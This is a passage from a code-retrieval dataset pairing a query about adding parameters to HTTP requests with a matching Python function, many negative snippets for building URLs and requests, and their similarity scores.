NotImplementedError", "def toHTTPRequest(self):\n query = {}\n if (not self.getValues() == None):\n values = self.getValues()\n for key, value in values.iteritems():\n query[key[0].upper() + key[1 : len(key)]] = value\n\n if (self.getMethod() == 'GET'):\n request = UrlLibRequest(self.getUrl() + urlencode(query))\n else:\n request = UrlLibRequest(self.getUrl(), urlencode(query))\n\n request.add_header('Accept-Encoding', 'gzip, deflate')\n\n return request", "def _build_request_url(self, params, kwargs, post=False):\n if post:\n return '%s%s' % (self.endpoint, self.methodname)\n else:\n return '%s%s?%s' % (self.endpoint, self.methodname, kwargs)", "def __call__(self, request):\n if self.where == \"qs\":\n parts = urlparse(request.url)\n qs = parse_qs(parts.query)\n qs[self.qs_key] = self.token\n request.url = urlunparse(\n (\n parts.scheme,\n parts.netloc,\n parts.path,\n parts.params,\n urlencode(qs),\n parts.fragment,\n )\n )\n elif self.where == \"header\":\n request.headers[\"Authorization\"] = \"Bearer {}\".format(self.token)\n return request", "def new_request(self, **kwargs):\n url = self.config[\"base_url\"]\n\n if kwargs.get(\"user_id\") is not None:\n url = url + kwargs[\"user_id\"]\n\n self.req = request.Request(host=self.config[\"host\"], protocol=constant.HTTP, url=url,\n method=kwargs[\"method\"], time_out=kwargs[\"timeout\"])\n\n return self", "def _build_request_url(self, params, kwargs, post=False):\n if post:\n return '%s?method=%s&type=%s' % (self.endpoint, self.methodname, params.get('type', 'json'))\n else:\n return '%s?%s' % (self.endpoint, kwargs)", "def _prepare_url(self):\n\n base_url = '{}://{}{}'.format(\n self.client.protocol, self.client.base_url, self.api_path\n )\n url_parts = '/'.join(\n [part for part in self.parameters[constants.RequestConst.PATH]]\n )\n\n if url_parts:\n final_url = '{}/{}'.format(base_url, url_parts)\n else:\n final_url = base_url\n\n if self.method == constants.RequestConst.GET:\n params = self.parameters[constants.RequestConst.QUERY]\n for param, value in params.items():\n if isinstance(value, list):\n params[param] = ','.join(value)\n elif isinstance(value, dict):\n params[param] = ','.join([f'{k}:{v}' for k, v in value])\n\n url_query = '?' + '&'.join([f'{k}={v}' for k, v in params.items()])\n final_url = '{}{}'.format(final_url, url_query)\n\n self.debug.ok('final url', final_url)\n\n return final_url", "def buildRequest(self, uri):\r\n req = urllib2.Request(uri)\r\n req.add_header('X-CSRFToken', self.token)\r\n req.add_header('Referer', 'http://www.ingress.com/intel')\r\n req.add_header('Accept-Charset', 'utf-8')\r\n req.add_header('User-agent', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.64 Safari/537.31')\r\n return req", "def _build_api_request_uri(self, http_method=\"GET\"):\n return self.urlobject_single.format(self._cb.credentials.org_key, self._model_unique_id)", "def _build_api_request_uri(self, http_method=\"GET\"):\n return self.urlobject_single.format(self._cb.credentials.org_key, self._model_unique_id)", "def make_request(self, url, action, data='', status_code='', parser=None):\n self._url = self.get_api_path(url)\n headers = {\n 'Content-Type': \"application/json\",\n 'Token': self.token,\n\n }\n kwargs = {}\n if headers:\n kwargs.update(headers=headers)\n if data:\n kwargs.update(data=json.dumps(data))\n\n return getattr(self.http, action.lower())(self._url, **kwargs)", "def _make_request(self, url: str, parameters: dict = None,\n method: str = 'GET', *args, **kwargs):\n response = requests.request(\n method=method,\n url=build_url(\n self.BASE_API_URL, url, parameters\n ),\n headers={\n 'Authorization': 'Bearer {}'.format(self._access_token)\n }, **kwargs\n )\n if response.ok:\n return response.json()\n raise MondoApiException(response.json()['message'])", "def request(self, url, data=None, params={}, files=None):\n params['token'] = self.token\n request = self.make_request(url, data=data, params=params, files=files)\n return request", "def build_request(input_id, method, params=None):\n request = {\"method\": method, \"id\": input_id}\n if params is not None:\n request[\"params\"] = params\n return request", "def request(query):", "def url(request):\n URL = namedtuple('URL', ['mainnet', 'testnet'])\n\n # For actual trading and market data, the mainnet URL will be used:\n # When developing application, the testnet URL should be used:\n url = URL(mainnet=\"https://api.switcheo.network/v2/\", testnet=\"https://test-api.switcheo.network/v2/\")\n\n def tear_down():\n # clean up here\n pass\n\n request.addfinalizer(tear_down)\n return url", "def build_url(self, request, action, **query):\n base = urlparse.urljoin(request['base_url'], self.auth_prefix + '/' + action)\n return appendArgs(base, query)", "def create_request(url, headers, attempts, request_type, data=None):\n request_func = getattr(requests, request_type)\n kwargs = {\"url\": url, \"headers\": headers}\n if request_type == \"post\" or request_type == \"patch\":\n kwargs[\"json\"] = data\n try:\n req = request_func(**kwargs)\n status_code = req.status_code\n time.sleep(1)\n while status_code >= 400 and attempts < 5:\n req = request_func(**kwargs)\n status_code = req.status_code\n attempts += 1\n time.sleep(1)\n return req\n except Exception as e:\n print(\"[ERROR] There was an error with the request, details:\")\n print(e)\n return None", "def construct_url(self,*path):\n base = self.request.protocol+\"://\"+self.request.host+\"/\"\n return base+\"/\".join(path)", "def _url_builder(url_root,api_key,path,params):\n params['api_key'] = api_key\n url_end = urlencode(params)\n url = \"%s%s%s\" % (url_root,path,url_end)\n return url", "def _request(url, data=None):\n if data:\n req = urllib.request.Request(\n url,\n json.dumps(data).encode(\"utf-8\"),\n {\n \"X-Starfighter-Authorization\": _KEY,\n \"accept-encoding\": \"gzip\",\n \"content-type\": \"application/json\"\n }\n )\n else:\n req = urllib.request.Request(url)\n return req", "def to_httpx_request(cls, **kwargs):\n request = kwargs[\"request\"]\n raw_url = (\n request.url.scheme,\n request.url.host,\n request.url.port,\n request.url.target,\n )\n return httpx.Request(\n request.method,\n parse_url(raw_url),\n headers=request.headers,\n stream=request.stream,\n extensions=request.extensions,\n )", "def request(self, method, url, *args, **kwargs):\n full_url = urljoin(self.base_url, url)\n if 'data' in kwargs:\n kwargs['data'] = self._encode_data(kwargs['data'])\n return super(Client, self).request(method, full_url, *args, **kwargs)", "def _submit_url(self, url_part, params=None, headers=None, request_method=get_url):\n\n token_params = [('token', self.login())]\n if params:\n\n # loop through parameters\n for item in params.items():\n\n # separate lists into tuples\n if isinstance(item[1], list):\n for v in item[1]:\n token_params.append((item[0], v))\n else:\n token_params.append(item)\n\n # Check if the url_part contains the datasource location\n url = url_part\n if not url_part.startswith(self.datasource.location):\n url = f'{self.datasource.location}{url_part}'\n\n return request_method(url, params=token_params,\n headers=headers, verify=self.verify_ssl)", "def _generate_url(action, query_params=None):\r\n if query_params:\r\n query_params = urllib.parse.urlencode(query_params)\r\n action = f\"{action}?{query_params}\"\r\n \r\n\r\n url = urllib.parse.urljoin(api_url, action)\r\n\r\n return url", "def build_request(self, theurl, fields, files, txheaders=None):\n\n content_type, body = self.encode_multipart_formdata(fields, files)\n if not txheaders: txheaders = {}\n txheaders['Content-type'] = content_type\n txheaders['Content-length'] = str(len(body))\n\n return urllib2.Request(theurl, body, txheaders)", "def __init__(self, request):\n self.arguments = {}\n for k, v in request.GET.items():\n self.arguments.setdefault(k, []).append(v)\n\n self.full_url = lambda: request.url\n self.host = request.host\n self.path = request.path", "def createRequest(self, **kwargs):\n for k,v in kwargs.items():\n self.request[\"content\"][k] = v\n \n return self.request", "def _make_request(self, method: str, params: Dict) -> Dict:\n\n # Define a new session.\n request_session = requests.Session()\n request_session.verify = True\n\n # Define a new request.\n request_request = requests.Request(\n method=method.upper(),\n url=self.bea_url,\n params=params\n ).prepare()\n\n # Send the request.\n response: requests.Response = request_session.send(\n request=request_request\n )\n\n # Close the Session\n request_session.close()\n\n print(response.url)\n\n # If the response is OK then return it.\n if response.ok and self._format == 'JSON':\n return response.json()\n elif response.ok and self._format == 'XML':\n return response.text\n else:\n raise requests.ConnectionError()", "def build_request(url, headers, body, initial_request: Request) -> Request:\n updated_request = Request(\n method=initial_request.method,\n url=url,\n headers=headers,\n content=body\n )\n\n if hasattr(initial_request, 'extensions'):\n updated_request.extensions = initial_request.extensions\n\n return updated_request", "def construct_url(self):\n path = [self.path]\n path.extend([str(x) for x in self.params])\n\n url = self.client.base_url + '/'.join(x for x in path if x)\n query = self.kwargs.get('query')\n\n if query:\n # Dict -> List\n if type(query) is dict:\n query = query.items()\n\n # Remove items with `None` value\n query = [\n (k, v) for (k, v) in query\n if v is not None\n ]\n\n # Encode query, append to URL\n url += '?' + urlencode(query)\n\n return url", "def sendCreateRequest(self, url:str, originator:str, ty:T=None, data:Any=None, parameters:Parameters=None, ct:ContentSerializationType=None, targetResource:Resource=None) -> Result:\n\t\tif Utils.isHttpUrl(url):\n\t\t\tCSE.event.httpSendCreate() # type: ignore\n\t\t\treturn CSE.httpServer.sendHttpRequest(requests.post, url, originator, ty, data, parameters=parameters, ct=ct, targetResource=targetResource)\n\t\tLogging.logWarn(dbg := f'unsupported url scheme: {url}')\n\t\treturn Result(status=True, rsc=RC.badRequest, dbg=dbg)", "def __http_build_url(self, url_path):\n\n return '{}://{}{}'.format(_GOVEE_API_PROTOCOL, _GOVEE_API_HOST, url_path)", "def url():\n ...", "def request_url(request):\n \n shot = request.GET['shot']\n path = request.GET['path']\n tree = request.GET['tree']\n\n xml_elmt = '{http://h1svr.anu.edu.au/}dataurlmap'\n lang_attr = {'{http://www.w3.org/XML/1998/namespace}lang': 'en'}\n url_xml = etree.Element(xml_elmt, attrib=lang_attr)\n \n shot_number = etree.SubElement(url_xml, 'shot_number', attrib={})\n shot_number.text = shot\n data_path = etree.SubElement(url_xml, 'path', attrib={})\n data_path.text = path\n data_tree = etree.SubElement(url_xml, 'tree', attrib={})\n data_tree.text = tree\n\n url_processor = URLProcessor(shot=int(shot), tree=tree, path=path)\n url = url_processor.get_url()\n url_el = etree.SubElement(url_xml, 'url', attrib={})\n url_el.text = url\n\n return HttpResponse(etree.tostring(url_xml),\n mimetype='text/xml; charset=utf-8')", "def __init__(self, url, method=\"GET\", params=None):\n self.url = url\n self.method = method\n self.params = params", "def create_request(params={}, path='/', method='POST'):\n request = DummyRequest(path)\n request.method = method\n request.args = params\n return request", "def __call__(self, requestStr):\n return self.connection.Request(requestStr)", "def __init__( httpconn, method, uri, uriparts, version, headers ):", "def strReq(url, data):\n return requests.Request('GET', url, params=data).prepare().url", "def __init__( request ):", "def req():\n return Request()", "def build_http_request(method: bytes, url: bytes,\n protocol_version: bytes = HTTP_1_1,\n headers: Optional[Dict[bytes, bytes]] = None,\n body: Optional[bytes] = None) -> bytes:\n if headers is None:\n headers = {}\n return build_http_pkt(\n [method, url, protocol_version], headers, body)", "def test_url_is_constructed_as_expected(self):\n t = ConfigurableDatasetRequest('SomeCoolSet',\n dataset_format=\"json\",\n params=dict(subjectid='45838',\n locale='eng',\n app_instance_uuid='1234'))\n self.assertEqual(Url('datasets/SomeCoolSet.json?subjectid=45838&'\n 'locale=eng&'\n 'app_instance_uuid=1234'), Url(t.url_path()))", "def _prepare(self, url):\n pass", "def _make_request(self, method, url, post_data=None, body=None):\r\n if not self.connection:\r\n self._connect()\r\n try:\r\n self.connection.close()\r\n except:\r\n pass\r\n self.connection.connect()\r\n headers = {}\r\n if self.auth_header:\r\n headers[\"Authorization\"] = self.auth_header\r\n self.connection.request(method, url, body, headers)\r\n resp = self.connection.getresponse()\r\n return resp", "def __init__(self, *segments, **params):\n self.url = URL(*segments, **params)", "def make_req_url(user, repo, endpoint, limit=50, queries=None):\n url = \"%s%s/%s/%s\" % (API_BASE_URL, user, repo, endpoint)\n\n # Set limit is given and is above 50, set limit to 50\n if limit and limit > 50:\n limit = 50\n url += \"?limit=%d\" % limit\n\n # Add additional query parameters\n if queries:\n for key in queries:\n url += \"&%s=%s\" % (key, queries[key])\n return url", "def url(self):\n ...", "def request(self, verb, url, payload: Optional[Any] = ..., multipart: Optional[Any] = ...):\n ...", "def _build_request(self, service, indicator_type, risk_rule: Optional[str] = None) -> requests.PreparedRequest:\n if service == 'connectApi':\n if risk_rule:\n url = self.BASE_URL + indicator_type + '/risklist?list=' + risk_rule\n else:\n url = self.BASE_URL + indicator_type + '/risklist'\n\n params = self.PARAMS\n params['gzip'] = True\n\n response = requests.Request(\n 'GET',\n url,\n headers=self.headers,\n params=params\n )\n\n elif service == 'fusion':\n url = self.BASE_URL + 'fusion/files/?path='\n if self.fusion_file_path is None:\n fusion_path = '/public/risklists/default_' + indicator_type + '_risklist.csv'\n else:\n fusion_path = self.fusion_file_path\n\n fusion_path = urllib.parse.quote_plus(fusion_path)\n response = requests.Request('GET',\n url + fusion_path,\n headers=self.headers,\n params=self.PARAMS)\n else:\n raise DemistoException(f'Service unknown: {service}')\n return response.prepare()", "def newRequest(self):\n return Request( )", "def _make_request(self, method, url, post_data=None, body=None):\n if not self.connection:\n self._connect()\n try:\n self.connection.close()\n except:\n pass\n self.connection.connect()\n headers = {}\n if self.auth_header:\n headers[\"Authorization\"] = self.auth_header\n self.connection.request(method, url, body, headers)\n resp = self.connection.getresponse()\n return resp", "def build_http_request(method: bytes, url: bytes,\n protocol_version: bytes = b'HTTP/1.1',\n headers: Optional[Dict[bytes, bytes]] = None,\n body: Optional[bytes] = None) -> bytes:\n if headers is None:\n headers = {}\n return build_http_pkt(\n [method, url, protocol_version], headers, body)", "def _make_request(self):\n response = urllib2.urlopen(\n url=self.api_url,\n data=self._get_request_data()\n )\n content = response.read()\n return json.loads(content.decode('utf8'))", "def requestURL(userID): #@NoSelf", "def _get_request(url, params):\n request = requests.get(url, params=params)\n\n return request", "def make_request(self, environ, **kwargs):\n factory = self.get(abcs.ARequest)\n request = factory(environ, self, **kwargs)\n self._set_request_attributes(request)\n return request", "def create(self, obj):\r\n request = http.Request('POST', self.get_url(), self.wrap_object(obj))\r\n\r\n return request, parsers.parse_json", "def createHttpRequest(self, endpoint, payload=None, method=None, xDepth=None):\n\n logger.debug(\"Endpoint: {}\".format(endpoint))\n\n if endpoint is None:\n raise TypeError(\"expected CIC endpoint url but received None\",\"CIC_WRONG_ARGUMENT_TYPE_ERR\")\n\n # if no playload provided always do HTTP GET by default\n if payload is None:\n logger.debug(\"Preparing HTTP GET\")\n request = urllib2.Request(self.cicUrl+endpoint)\n\n elif ((payload is not None) and (method == \"POST\")):\n logger.debug(\"Preparing HTTP Post\")\n data = json.dumps(payload)\n request = urllib2.Request(self.cicUrl+endpoint,data, {'Content-Type': 'application/json'})\n request.get_method = lambda: 'POST'\n\n elif ((payload is not None) or (method==\"PATCH\")):\n logger.debug(\"Preparing HTTP Patch\")\n data = urllib.urlencode(payload)\n request = urllib2.Request(self.cicUrl+endpoint,data)\n request.get_method = lambda: 'PATCH'\n\n if xDepth:\n request.add_header(\"X-Depth\", xDepth)\n\n return request", "def query(url):", "def create_request_url(title):\n q_string = title.replace(' ', '+')\n return f\"https://google-search3.p.rapidapi.com/api/v1/search/q={q_string}num=2\"", "def new_url(module):\n # To create the URL, we need to take the format string and return it with no params\n url_base = \"/axapi/v3/ddos/template/tcp\"\n\n f_dict = {}\n f_dict[\"name\"] = \"\"\n\n return url_base.format(**f_dict)", "def request(self, method: str, url: str, **kwargs) -> requests.Response:\n url = parse.urljoin(self.http_address, url)\n return requests.request(method, url, **kwargs)", "def make_request(self, request_type: RequestTypes, payload: dict, url_extras: [str] = []) -> json:\n s = requests.Session()\n s.headers.update({\n \"Authorization\": \"Bearer %s\" % self.access_token,\n \"Content-Type\": \"application/json\"\n })\n url = self.url_base + self.get_url_end_string(url_extras)\n #print(url)\n if request_type == RequestTypes.POST:\n response = s.post(url, json=payload)\n elif request_type == RequestTypes.GET:\n response = s.get(url, json=payload)\n else:\n print(\"ERROR: '\" + request_type + \"' is not a valid request type\")\n exit(1)\n response_json = response.json()\n self.validate_response(response_json)\n return response_json", "def url(self, request_path=\"\"):\n return f\"{self.scheme}://{self.host}/{request_path}\"", "def make_request(action, r_addr, l_addr, data=None, token=None):\n return {\n 'action': action,\n 'time': time(),\n 'data': data,\n 'token': token,\n 'address': {\n 'remote': { # TODO: переименовать в IP\n 'addr': r_addr.addr,\n 'port': r_addr.port,\n },\n 'local': { # TODO: переименовать в MAC и передавать MAC\n 'addr': l_addr.addr,\n 'port': l_addr.port,\n },\n },\n }", "def _request(self, method, url, payload=None, **params):\n kwargs = dict(params=params)\n kwargs[\"timeout\"] = self._timeout\n if not url.startswith('http'):\n url = self.prefix + url\n headers = self._auth_headers()\n headers['Content-Type'] = 'application/json'\n\n if payload:\n kwargs[\"data\"] = json.dumps(payload)\n gs = self._gpool.spawn if self._gpool else gevent.spawn\n r = gs(self.session.request, method, url, headers=headers, **kwargs)\n r.fetch = partial(self.join, r)\n update_wrapper(r.fetch, self.join)\n #gevent.sleep(0.05)\n return r", "def __init__(self):\n self._url = \"\"\n self._verb = VERBS.GET\n self._params = {}\n self._data = {}", "def do_request(self, url, in_data=None, in_file_dict=None):\n url_string=url\n logger.debug(\n \"do_request request string: {string}\".format(string=url_string)\n )\n response=requests.post(\n url_string,\n data=in_data,\n files=in_file_dict,\n cookies=self.cookies #For Authentication!\n )\n return response", "def create(cls, request):\n if isinstance(request, Request):\n request = request.prepare()\n\n # Method\n method = request.method.lower()\n\n # Cookies\n cookie = {}\n if request._cookies is not None:\n # cookies are stored in a cookiejar object\n cookie = request._cookies.get_dict()\n\n # Preparing a request formats the URL with params, strip them out again\n o = urlparse(request.url)\n params = parse_qs(o.query)\n # extract the URL without query parameters\n url = o._replace(query=None).geturl()\n\n # Order matters because all python requests issued from a session\n # include Accept */* which does not necessarily match the content type\n mimetype = request.headers.get(\"Content-Type\") or request.headers.get(\n \"Accept\"\n )\n\n # Headers - request.headers is not an instance of Headers\n # which is expected\n header = Headers(dict(request.headers))\n\n # Body\n # TODO: figure out if request._body_position is relevant\n body = request.body\n\n # Path gets deduced by path finder against spec\n parameters = RequestParameters(\n query=ImmutableMultiDict(params),\n header=header,\n cookie=cookie,\n )\n return OpenAPIRequest(\n full_url_pattern=url,\n method=method,\n parameters=parameters,\n body=body,\n mimetype=mimetype,\n )", "def __init__(self, url):\n self.url = url\n self.admin_url = os.path.join(url, \"__admin\")\n self.admin_mapping_url = os.path.join(self.admin_url, \"mappings\")\n self.mapping_reset_url = os.path.join(self.admin_mapping_url, 'reset')\n self.requests_url = \"%s/requests\" % self.admin_url", "def createRequest(self):\n self.get_bmc_website()\n self.__createChangeRequest = Create(self.browser)\n self.__createChangeRequest.createNCR()", "def __init__(self, url):\n\t\tself._url = url", "def __init__(self, url, type):\n self.url = url\n self.type = type", "def create():\n link_user = request.cookies.get('linkuser')\n user_browser = request.user_agent.browser\n time_stamp = datetime.now()\n action = \"create\" ## create or autocreate? add a request param.\n lat = request.form['lat']\n longitude = request.form['long'] \n\n if request.method == 'POST':\n url = request.form['url']\n short = request.form['short']\n\n ## add http:// if not in url\n if url.find('http://') == -1: \n app.logger.debug(\"adding http://\")\n url = 'http://' + url\n\t\n ## log user action\n logline = [str(time_stamp), link_user, user_browser, action, url, short, lat, longitude ]\n app.logger.debug(logline)\n write_log(logline)\t\n\n ## check if url in db\n for shortDB, urlDB in db.items():\n if url == urlDB or url[:7] +'www.'+ url[7:] == urlDB:\n short = shortDB\n app.logger.debug(url+\" already stored at \"+ short)\n return jsonify(url=url,short=short,link=\"http://people.ischool.berkeley.edu/~arenold/server/\"+short)\n\t\t\n\t\t## store new short and url\n app.logger.debug(\"request to store new \"+url+\" at \"+short)\n clicks[str(short)] = 0 \n db[str(short)] = str(url)\n\t\n return jsonify(url=url,short=short,link=\"http://people.ischool.berkeley.edu/~arenold/server/\"+short)", "def get_url(self, **kwargs):\n\n return build(\n self._request.path,\n self._request.GET,\n self._meta.prefix,\n **kwargs )", "def make_request_from_data(self, data):\n data = json.loads(data)\n must_have_keys = ('url',)\n self._check_data_keys(must_have_keys, data)\n url = data.pop('url', )\n self.headers = {\n \"User-Agent\": \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 \"\n \"(KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36\"\n }\n return scrapy.Request(\n url,\n callback=self.parse,\n meta={'extra_data': data},\n dont_filter=True,\n headers=self.headers\n )", "def url_for_request(self, method, extras):\n raise NotImplementedError(\"Should be overriden by subclass\")", "def make_url(site,node,instrument,method,stream,API_USERNAME,API_TOKEN):\n\n SENSOR_BASE_URL = 'https://ooinet.oceanobservatories.org/api/m2m/12576/sensor/inv/'\n VOCAB_BASE_URL = 'https://ooinet.oceanobservatories.org/api/m2m/12586/vocab/inv'\n meta_request_url ='/'.join((VOCAB_BASE_URL,site,node,instrument)) # Python wizard best\n data_request_url ='/'.join((SENSOR_BASE_URL,site,node,instrument,method,stream))\n\n # Retrieve vocabulary information for a given instrument\n r = requests.get(meta_request_url, auth=(API_USERNAME, API_TOKEN))\n meta_data = r.json()\n\n return (data_request_url,meta_data)", "def _GenHttpRequestProto(self):\n request = jobs_pb2.HttpRequest()\n request.source_ip = \"127.0.0.1\"\n request.user_agent = \"Firefox or something\"\n request.url = \"http://test.com/test?omg=11%45x%20%20\"\n request.user = \"anonymous\"\n request.timestamp = int(time.time() * 1e6)\n request.size = 1000\n return request", "def create() -> TJsonResponse:\n if request.headers['Content-Type'] == 'application/json':\n url = request.json.get('url')\n else:\n url = request.form.get('url')\n if not url:\n return jsonify(error='bad request'), 400\n result = scrape.scrape_meta_for_url(url)\n inserted_id, tags = result.get()\n url_hash = encode(inserted_id)\n response_body: Dict[str, Any] = jsonify(hash=url_hash, short_url=f'https://fanlens.io/@{url_hash}', tags=tags)\n return response_body", "def _generate_url(self, **kwargs):\n path = self.url_path.format(**kwargs)\n return self.poolbot.generate_url(path)", "def urlpath( request, *args, **kwargs ):", "def _get_request(url_root,api_key,path,response_type,params, ssl_verify):\n url = _url_builder(url_root,api_key,path,params)\n content = _fetch(url, ssl_verify)\n response = _dispatch(response_type)(content)\n return response", "def _request(self, url: str) -> http.client.HTTPResponse:\n self.request = urllib.request.Request(\n url,\n headers={'User-Agent': 'Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X)'})\n try:\n return urllib.request.urlopen(self.request, timeout=10)\n except Exception as e:\n # print(e)\n # exit(-1)\n print(e, url)\n raise e", "def create_short_url():\n if request.method == 'POST':\n if 'url' in request.args:\n og_url = request.args['url']\n\n if url_check(og_url) is True:\n if 'custom' in request.args:\n token_string = request.args['custom']\n if 'tag' in request.args:\n tag_url = request.args['tag']\n else:\n tag_url = ''\n else:\n token_string = random_token()\n\n if 'tag' in request.args:\n tag_url = request.args['tag']\n else:\n tag_url = ''\n\n conn = psycopg2.connect(host=host, user=user, password=passwrd, database=db)\n cursor = conn.cursor()\n check_row = \"SELECT S_URL FROM WEB_URL WHERE S_URL = %s FOR UPDATE\"\n cursor.execute(check_row, (token_string,))\n check_fetch = cursor.fetchone()\n\n if check_fetch is None:\n insert_row = \"\"\"\n\t\t\t\t\t\tINSERT INTO WEB_URL(URL , S_URL , TAG) VALUES( %s, %s , %s)\n\t\t\t\t\t\t\"\"\"\n\n cursor.execute(insert_row, (og_url, token_string, tag_url,))\n\n conn.commit()\n conn.close()\n\n short_url = shorty_host + token_string\n long_url = og_url\n data = jsonify({\n 'long_url': og_url,\n 'short_url': short_url,\n 'custom': token_string,\n 'tag': tag_url\n })\n\n return make_response(data, 200)\n else:\n data = jsonify({'error': 'suffix already present'})\n return make_response(data, 200)\n else:\n data = jsonify({'error': 'URL given is not valid . Enter a valid URL.'})\n return make_response(data, 200)\n else:\n data = jsonify({'error': 'invalid request'})\n return make_response(data, 405)\n else:\n data = jsonify({'error': 'Invalid Method Used'})\n return make_response(data, 405)", "def request_factory(environ):\n request = Request(environ)\n _LOG.debug('trunctated request body: {b}'.format(b=request.body[:1000]))\n return request", "def get_request(url):\n\tr = requests.get(url)\n\treturn(r)", "def requests_request_factory(method, endpoint, urlargs, data, is_json, headers,\n files, verify_ssl):\n client_func = getattr(requests, method.lower())\n\n if headers is None:\n headers = [('Content-Type', 'application/json')] if is_json else []\n\n if data is not None:\n request_args = dict(\n data=json.dumps(data) if is_json else data,\n headers=dict(headers),\n )\n else:\n request_args = {}\n\n if files is not None:\n request_args['files'] = files\n\n return client_func(\n url_for(\n endpoint,\n _external=True,\n _scheme='https',\n **urlargs\n ),\n verify=verify_ssl,\n **request_args\n )", "def __init__(self, request: object) -> None:\n super().__init__({}, request, URL, Api)", "def generate_call_string(self):\n if(self.api_key is None):\n raise error(\"API Key is not defined\");#Should base class do this? \n \n self.call_url=self.baseurl;\n if hasattr(self,'search_str'):\n self.call_url+=self.search_str;\n if hasattr(self,'filter_field_str'):\n self.call_url=self.call_url+'&'+self.filter_field_str;\n \n #loop over the parameters dict\n for key in self.input_params:\n self.call_url+=self.input_params[key];\n \n #finally add api key. at this point already checked it exists\n self.call_url=self.call_url+'&'+\"api-key=\"+str(self.api_key);\n return;", "def _make_request(self):\n try:\n self.response = requests.request(\n method=self.method,\n url=self.url,\n params=self.params,\n data=self.data,\n )\n\n logger.debug(f\"Request URL: {self.response.url}\")\n\n self.response.raise_for_status()\n\n # wrap all `requests` library error and serve as custom application error\n except RequestException as e:\n logger.error(e.__str__(), exc_info=True)\n raise ExternalAPIError(\n \"Error while communication with External API\"\n )" ]
[ "0.7095145", "0.70785993", "0.7020341", "0.69661885", "0.6836974", "0.67563176", "0.6740314", "0.6718406", "0.6607577", "0.6582395", "0.65728194", "0.65544945", "0.6512967", "0.6509939", "0.6411456", "0.6373932", "0.63712084", "0.63712084", "0.6340278", "0.62835985", "0.6275929", "0.6239781", "0.6228785", "0.62185687", "0.6202315", "0.62002295", "0.61977345", "0.61963046", "0.617654", "0.61751", "0.6171625", "0.6169888", "0.61685765", "0.6168387", "0.6167578", "0.61653703", "0.6162668", "0.6140773", "0.613641", "0.61252606", "0.6103968", "0.60960615", "0.6087475", "0.60845524", "0.60336804", "0.6029318", "0.6025006", "0.6019441", "0.6013315", "0.59920657", "0.59917516", "0.59870833", "0.5984618", "0.5950742", "0.5941145", "0.5936102", "0.59274983", "0.5923617", "0.59198415", "0.59191024", "0.59139913", "0.59034216", "0.5899883", "0.5897906", "0.58949405", "0.58876336", "0.58848464", "0.58829737", "0.58696765", "0.5868804", "0.5868199", "0.58629954", "0.5862966", "0.5861373", "0.58468056", "0.5844509", "0.58426625", "0.5840703", "0.58359295", "0.5809798", "0.5799212", "0.57970035", "0.5794672", "0.5793703", "0.5790249", "0.57900816", "0.57883245", "0.57874936", "0.5783161", "0.57804614", "0.577019", "0.57684237", "0.57639164", "0.5761018", "0.5750315", "0.57498676", "0.57465774", "0.57445735", "0.5741615", "0.5736414", "0.57351124" ]
0.0
-1
Adding parameters to a request
def get_request_kwargs(self, api_params, *args, **kwargs): serialized = self.serialize_data(kwargs.get("data")) kwargs["data"] = self.format_data_to_request(serialized) return kwargs
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def add_params(self, params: t.Mapping[str, str]) -> 'Request':\n return replace(self, params={**self.params, **params})", "def additional_access_token_request_parameters(self, parameters, request):", "def get_request_extra_params(self, **kwargs):\n params = self.request_extra_params.copy()\n params.update(kwargs)\n return params", "def _build_param_request(self):\n search_params = []\n for param in self.params:\n # print(param)\n if self.params[param] is not None:\n search_params.append(param + '={}'.format(self.params[param]))\n search_params = '&' + '&'.join(search_params)\n return search_params", "def _params(self, request: Request) -> dict:\n params = {'forceAsync': True}\n\n subset = self._spatial_subset_params(request) + self._temporal_subset_params(request)\n if len(subset) > 0:\n params['subset'] = subset\n\n for p, val in request.parameter_values():\n if type(val) == str:\n params[p] = val\n elif type(val) == bool:\n params[p] = str(val).lower()\n elif type(val) == list and type(val[0]) != str:\n params[p] = ','.join([str(v) for v in val])\n else:\n params[p] = val\n\n return params", "def add_params(self, params):\n return self.set_param('params', params)", "def createRequest(self, **kwargs):\n for k,v in kwargs.items():\n self.request[\"content\"][k] = v\n \n return self.request", "def build_request(input_id, method, params=None):\n request = {\"method\": method, \"id\": input_id}\n if params is not None:\n request[\"params\"] = params\n return request", "def request_vars(self):", "def add_parameters_to_url(path, **kwargs):\n return path + \"?\" + urllib.urlencode(kwargs)", "def parameter_request(\n self, headers: Optional[Mapping[str, str]] = None, **parameters: str\n ) -> requests.Response:\n # Subcall default request method to use ratelimit, etc\n return self.request(\"\", parameters=parameters, headers=headers)", "def addParams(self, *params):\n for param in params:\n self.addParam(param)\n self.params = list(set(self.params))", "def append_to_request(self, request_base, request_object):\n\n pass", "def request_params(self):\n return {'key': self.key, 'hash': self.hash}", "def add_querystring(context, **kwargs):\n\n updated = context['request'].GET.copy()\n\n # have to iterate over and not use .update as it's a QueryDict not a dict\n for k, v in kwargs.items():\n updated[k] = v\n\n return '?{}'.format(updated.urlencode()) if updated else ''", "def inject_post_param(request, injectionstring):\r\n requests = []\r\n return requests", "def _add_query_param(self, route_path, name, type_, default=None):\n route = self._find_route(route_path)\n # logging.info(\"Before:\", route.dependant.query_params)\n query_param = create_query_param(name, type_, default)\n route.dependant.query_params.append(query_param)\n # logging.info(\"After:\", route.dependant.query_params)", "def process_request(self, req, resp, resource, params):", "def _get_method_args(self, method, request, params):\n idx = 0\n\n if method.__servicemethod__['store_arg']:\n params.insert(idx, method.__servicemethod__['store'])\n idx += 1\n\n if method.__servicemethod__['request_arg']:\n params.insert(idx, request)\n\n return params", "def add_param(self, paraminfo):\n self.params[paraminfo.name] = paraminfo", "def set_params(self, **kwargs):\n ...", "def updatekwargs(self,request):\n updated_dict={}\n if isinstance(request.query_params,QueryDict):\n updated_dict = {k:','.join(v) for k,v in request.query_params.iterlists()}\n else:\n updated_dict = request.query_params\n updated_dict.update(self.kwargs)\n\n self.kwargs = updated_dict", "def __addAuthParms(self, request_parms):\n ts = str(time.time())\n hashbase = ts+self.conf.getParm(\"private_key\")+self.conf.getParm(\"public_key\")\n hashdigest = hashlib.md5(hashbase.encode('ascii')).hexdigest()\n res = {'ts': ts, 'hash': hashdigest, 'apikey': self.conf.getParm(\"public_key\")}\n for it in request_parms:\n res[it] = 